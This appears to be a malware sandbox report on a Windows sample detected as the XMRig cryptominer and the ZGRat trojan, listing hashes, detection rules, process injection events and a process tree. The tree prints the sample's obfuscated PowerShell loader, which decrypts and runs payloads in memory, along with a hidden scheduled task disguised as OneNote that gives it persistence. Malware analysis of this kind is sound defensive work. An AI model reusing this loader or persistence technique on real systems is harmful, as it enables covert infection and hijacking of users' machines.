xmrig | fabd087044389ec6e9d7e11f59687c9527e0aec25a83f8dae30da8404efe0e39

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
19/04/2024, 01:18

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

5.3MB
MD5

6d075d047098d57266aa59b97d288bda
SHA1

1cb3eabf3ddbf47ea0f9eebac64b6689f7645cc1
SHA256

fabd087044389ec6e9d7e11f59687c9527e0aec25a83f8dae30da8404efe0e39
SHA512

9167cabbeca956b977d2ec2e88f8d1c03511d2271850df7e1d01e1b2fd76ac4534e782c236ad28fe92cee94b289a8c8ba74f1ec35b9028b70339adc4af3dfa69
SSDEEP

98304:+3G06n81vgUXP6+UXGLVk+3UXLtIhLuzXAapVgPrvqE3LDvuseWMeX:+3Gdn4oQP6L+3MLOJuzXXTgzP3ZeWF

Score

10^/10

xmrig zgrat miner rat

Malware Config

Signatures

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral2/memory/216-133-0x000001E255E90000-0x000001E255EE6000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral2/memory/3180-142-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-143-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-144-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-145-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-147-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-146-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-148-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-149-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-151-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-155-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-156-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-157-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-158-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-159-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-167-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3180-168-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/216-133-0x000001E255E90000-0x000001E255EE6000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation	file.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 216 set thread context of 3180	216	powershell.exe	117

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1548	powershell.exe
1548	powershell.exe
1060	powershell.exe
1060	powershell.exe
3648	powershell.exe
3648	powershell.exe
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
216	powershell.exe
216	powershell.exe
2648	powershell.exe
2648	powershell.exe
2648	powershell.exe
1972	powershell.exe
1972	powershell.exe
3704	powershell.exe
3704	powershell.exe
216	powershell.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe
3180	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	3648	powershell.exe
Token: SeIncreaseQuotaPrivilege	3648	powershell.exe
Token: SeSecurityPrivilege	3648	powershell.exe
Token: SeTakeOwnershipPrivilege	3648	powershell.exe
Token: SeLoadDriverPrivilege	3648	powershell.exe
Token: SeSystemProfilePrivilege	3648	powershell.exe
Token: SeSystemtimePrivilege	3648	powershell.exe
Token: SeProfSingleProcessPrivilege	3648	powershell.exe
Token: SeIncBasePriorityPrivilege	3648	powershell.exe
Token: SeCreatePagefilePrivilege	3648	powershell.exe
Token: SeBackupPrivilege	3648	powershell.exe
Token: SeRestorePrivilege	3648	powershell.exe
Token: SeShutdownPrivilege	3648	powershell.exe
Token: SeDebugPrivilege	3648	powershell.exe
Token: SeSystemEnvironmentPrivilege	3648	powershell.exe
Token: SeRemoteShutdownPrivilege	3648	powershell.exe
Token: SeUndockPrivilege	3648	powershell.exe
Token: SeManageVolumePrivilege	3648	powershell.exe
Token: 33	3648	powershell.exe
Token: 34	3648	powershell.exe
Token: 35	3648	powershell.exe
Token: 36	3648	powershell.exe
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeIncreaseQuotaPrivilege	1348	powershell.exe
Token: SeSecurityPrivilege	1348	powershell.exe
Token: SeTakeOwnershipPrivilege	1348	powershell.exe
Token: SeLoadDriverPrivilege	1348	powershell.exe
Token: SeSystemProfilePrivilege	1348	powershell.exe
Token: SeSystemtimePrivilege	1348	powershell.exe
Token: SeProfSingleProcessPrivilege	1348	powershell.exe
Token: SeIncBasePriorityPrivilege	1348	powershell.exe
Token: SeCreatePagefilePrivilege	1348	powershell.exe
Token: SeBackupPrivilege	1348	powershell.exe
Token: SeRestorePrivilege	1348	powershell.exe
Token: SeShutdownPrivilege	1348	powershell.exe
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeSystemEnvironmentPrivilege	1348	powershell.exe
Token: SeRemoteShutdownPrivilege	1348	powershell.exe
Token: SeUndockPrivilege	1348	powershell.exe
Token: SeManageVolumePrivilege	1348	powershell.exe
Token: 33	1348	powershell.exe
Token: 34	1348	powershell.exe
Token: 35	1348	powershell.exe
Token: 36	1348	powershell.exe
Token: SeIncreaseQuotaPrivilege	1348	powershell.exe
Token: SeSecurityPrivilege	1348	powershell.exe
Token: SeTakeOwnershipPrivilege	1348	powershell.exe
Token: SeLoadDriverPrivilege	1348	powershell.exe
Token: SeSystemProfilePrivilege	1348	powershell.exe
Token: SeSystemtimePrivilege	1348	powershell.exe
Token: SeProfSingleProcessPrivilege	1348	powershell.exe
Token: SeIncBasePriorityPrivilege	1348	powershell.exe
Token: SeCreatePagefilePrivilege	1348	powershell.exe
Token: SeBackupPrivilege	1348	powershell.exe
Token: SeRestorePrivilege	1348	powershell.exe
Token: SeShutdownPrivilege	1348	powershell.exe
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeSystemEnvironmentPrivilege	1348	powershell.exe
Token: SeRemoteShutdownPrivilege	1348	powershell.exe
Token: SeUndockPrivilege	1348	powershell.exe
Token: SeManageVolumePrivilege	1348	powershell.exe
Token: 33	1348	powershell.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 1292 wrote to memory of 3548	1292	file.exe	86
PID 1292 wrote to memory of 3548	1292	file.exe	86
PID 3548 wrote to memory of 816	3548	cmd.exe	89
PID 3548 wrote to memory of 816	3548	cmd.exe	89
PID 816 wrote to memory of 2832	816	cmd.exe	92
PID 816 wrote to memory of 2832	816	cmd.exe	92
PID 816 wrote to memory of 1548	816	cmd.exe	93
PID 816 wrote to memory of 1548	816	cmd.exe	93
PID 1548 wrote to memory of 1060	1548	powershell.exe	96
PID 1548 wrote to memory of 1060	1548	powershell.exe	96
PID 1548 wrote to memory of 3648	1548	powershell.exe	101
PID 1548 wrote to memory of 3648	1548	powershell.exe	101
PID 1548 wrote to memory of 1348	1548	powershell.exe	104
PID 1548 wrote to memory of 1348	1548	powershell.exe	104
PID 1548 wrote to memory of 4372	1548	powershell.exe	106
PID 1548 wrote to memory of 4372	1548	powershell.exe	106
PID 4372 wrote to memory of 2808	4372	cmd.exe	108
PID 4372 wrote to memory of 2808	4372	cmd.exe	108
PID 2808 wrote to memory of 1292	2808	cmd.exe	110
PID 2808 wrote to memory of 1292	2808	cmd.exe	110
PID 2808 wrote to memory of 216	2808	cmd.exe	111
PID 2808 wrote to memory of 216	2808	cmd.exe	111
PID 216 wrote to memory of 2648	216	powershell.exe	112
PID 216 wrote to memory of 2648	216	powershell.exe	112
PID 216 wrote to memory of 1972	216	powershell.exe	113
PID 216 wrote to memory of 1972	216	powershell.exe	113
PID 216 wrote to memory of 3704	216	powershell.exe	115
PID 216 wrote to memory of 3704	216	powershell.exe	115
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117
PID 216 wrote to memory of 3180	216	powershell.exe	117

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mhk.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\mhk.cmd"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
      4⤵
      PID:2832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\mhk')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3648
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1348
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network64476Man.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network64476Man.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
        7⤵
        
        PID:1292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network64476Man')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3704
        
        C:\Windows\explorer.exe
        
        explorer.exe
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
72ca5d02a4dfa96668fd93354b2ee96f

SHA1
5a090ac46058539d5128546634fd651ca05a9124

SHA256
37a4dae518960633d968c4d15836da8916626159b742234f557077518a07d28c

SHA512
8a82291113e5565b032803491a694971856aa373b5ecabd544fee17e1bfd81262d15dc04c445079074832a14985f1721598234cc25490b64d9d0d3ba42ec3ea2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
11b2ddac5f77354fdf267769650c46f4

SHA1
4b4fb743eefb36191871d8bd3dc374caed41a9db

SHA256
b61a60bf71fdae451a7be222d041d153262224d241c0803e0f7bb289013ac134

SHA512
72372c52617151d65d97363770b128c8a0180e4713ec98f992c2f802c4781fcd6ab4dc6153b256254870aae63e30d453fb61489c1f2f9f912d5efd1bb97bc2ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c118e29489863b7d5859e4e697842329

SHA1
ede543c75580fa7caba7d21f42d674248e3c0885

SHA256
22d4ec09704d261479cf9521f93ba4840fbe93601f69fb2dd71e6c936dcae091

SHA512
868ba879e1a4e5c43824abd70b29ac97a8153b8f9dc49b8d378ca465715ab1833d3d87ba5a0eb4eb7543b5d8cc561946441626e25c0c60afb90bea020113ed44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
09392ba78a0151b728c14aa32208cf70

SHA1
aad606be1828e1d596fb199bb610c187d9193176

SHA256
7381b12b8daa10c2bc944459a2e5227c772a51a7a6e39dcf7bfa4e57c20e4ace

SHA512
ecfb4bffc2371c4a3d042ddbf951c53dcce1bc7c4b6e9d1045d7a611ddbdb36f48522fdfca2cb52c4fde0903d2508dab58598c2688de767a2546ecfa4662cc37

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzbmkvru.3pc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\mhk.cmd

Filesize
6.3MB

MD5
2abcb1711e177e29691ea8ee499e29f6

SHA1
308ee8f4af06199342075b17ea48fadc1734b636

SHA256
a89d5d1e3559f1ea719f642c1eba7a6f7c00b11473d02542c91f4578c0af54e9

SHA512
c8211787681dbd34a2d2d2b56f8d49f1daadd28cc13b6edd9ba2e57ca4c76c93fe9363419d09032d167085215eb8e8c85d7eb3515ab96ee3eb6a6a39702ebf82

Download Submit
memory/216-166-0x00007FFC62500000-0x00007FFC62519000-memory.dmp

Filesize
100KB

Download
memory/216-160-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/216-133-0x000001E255E90000-0x000001E255EE6000-memory.dmp

Filesize
344KB

Download
memory/216-134-0x0000000140000000-0x00000001406DE000-memory.dmp

Filesize
6.9MB

Download
memory/216-86-0x000001E253900000-0x000001E253910000-memory.dmp

Filesize
64KB

Download
memory/216-85-0x000001E253900000-0x000001E253910000-memory.dmp

Filesize
64KB

Download
memory/216-84-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/216-161-0x000001E253900000-0x000001E253910000-memory.dmp

Filesize
64KB

Download
memory/216-165-0x00007FFC62500000-0x00007FFC62519000-memory.dmp

Filesize
100KB

Download
memory/216-164-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/216-162-0x000001E253900000-0x000001E253910000-memory.dmp

Filesize
64KB

Download
memory/1060-21-0x0000019142990000-0x00000191429A0000-memory.dmp

Filesize
64KB

Download
memory/1060-20-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/1060-34-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/1060-22-0x0000019142990000-0x00000191429A0000-memory.dmp

Filesize
64KB

Download
memory/1348-54-0x000001DAAAFF0000-0x000001DAAB000000-memory.dmp

Filesize
64KB

Download
memory/1348-53-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/1348-68-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/1348-55-0x000001DAAAFF0000-0x000001DAAB000000-memory.dmp

Filesize
64KB

Download
memory/1348-66-0x000001DAAAFF0000-0x000001DAAB000000-memory.dmp

Filesize
64KB

Download
memory/1548-100-0x00007FFC62500000-0x00007FFC62519000-memory.dmp

Filesize
100KB

Download
memory/1548-18-0x000001FBAF8D0000-0x000001FBAF914000-memory.dmp

Filesize
272KB

Download
memory/1548-35-0x000001FB95080000-0x000001FB95088000-memory.dmp

Filesize
32KB

Download
memory/1548-88-0x000001FBAD710000-0x000001FBAD720000-memory.dmp

Filesize
64KB

Download
memory/1548-89-0x000001FBAD710000-0x000001FBAD720000-memory.dmp

Filesize
64KB

Download
memory/1548-7-0x000001FBAF830000-0x000001FBAF852000-memory.dmp

Filesize
136KB

Download
memory/1548-73-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/1548-101-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/1548-11-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/1548-36-0x000001FBD0030000-0x000001FBD04F8000-memory.dmp

Filesize
4.8MB

Download
memory/1548-19-0x000001FBAFD50000-0x000001FBAFDC6000-memory.dmp

Filesize
472KB

Download
memory/1548-16-0x000001FBAD710000-0x000001FBAD720000-memory.dmp

Filesize
64KB

Download
memory/1548-17-0x000001FBAD710000-0x000001FBAD720000-memory.dmp

Filesize
64KB

Download
memory/1972-104-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/1972-117-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/1972-116-0x0000022B41330000-0x0000022B41340000-memory.dmp

Filesize
64KB

Download
memory/2648-103-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/2648-99-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/3180-151-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-156-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-141-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-142-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-143-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-144-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-145-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-147-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-146-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-148-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-149-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-170-0x0000000013380000-0x00000000133A0000-memory.dmp

Filesize
128KB

Download
